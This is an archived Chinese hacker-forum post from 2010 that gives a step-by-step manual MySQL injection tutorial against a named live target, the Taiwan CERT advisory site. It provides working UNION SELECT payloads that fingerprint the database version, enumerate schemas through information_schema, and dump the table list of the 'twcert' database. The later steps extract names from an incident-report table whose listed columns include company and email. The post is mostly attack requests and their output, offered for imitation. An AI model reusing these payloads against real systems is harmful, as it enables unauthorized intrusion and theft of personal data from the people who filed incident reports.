【3.A.S.T】网络安全爱好者's Archiver

黑客学习

晓谛 发表于 2010-11-6 18:50

mysql注入提权命令

[i=s] 本帖最后由 晓谛 于 2010-11-6 18:52 编辑 [/i]

php类型的网站很多都存在MYSQL注入漏洞,而利用注入来获取权限的方法又多种多样。本文以mysql中支持的SCHEMATA库为例讲述mysql注入高级暴库用户密码。

1.判断版本[url]http://www.cert.org.tw/document/advisory/detail.php?id=7[/url] and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
2.猜解 字段数目,用order by也可以猜,也可以用union select一个一个的猜解
[url]http://www.cert.org.tw/document/advisory/detail.php?id=7[/url] and 2=4 union select 1,2,3,4,5,6,7,8,9--
3.查看数据库版本及当前用户,[url]http://www.cert.org.tw/document/advisory/detail.php?id=7[/url] and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
数据库版本 5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
4.判断有没有写权限
[url]http://www.cert.org.tw/document/advisory/detail.php?id=7[/url] and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
没办法,手动猜 表啦

5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手 法,不多说,如下
[url]http://www.cert.org.tw/document/...[/url] union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
成 功查出所有数据库,国外的黑客就是不一般。数据库如下:
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
6. 爆表,爆的是twcert库
[url]http://www.cert.org.tw/document/[/url] ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
爆 出如下表
downloadfile,irsys,newsdata,secrpt,secrpt_big5

7.爆列名, 这次爆的是irsys表
[url]http://www.cert.org.tw/document/[/url] ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
爆 出如下列
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8. 查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
[url]http://www.cert.org.tw/document/[/url] ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
返 回是3,说明每个列里有3个地段
9.爆字段内容
[url]http://www.cert.org.tw/document/[/url] ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
爆 出name列的第一个字段的内容
[url]http://www.cert.org.tw/document/[/url] ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
爆 出name列的第二个字段的内容

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.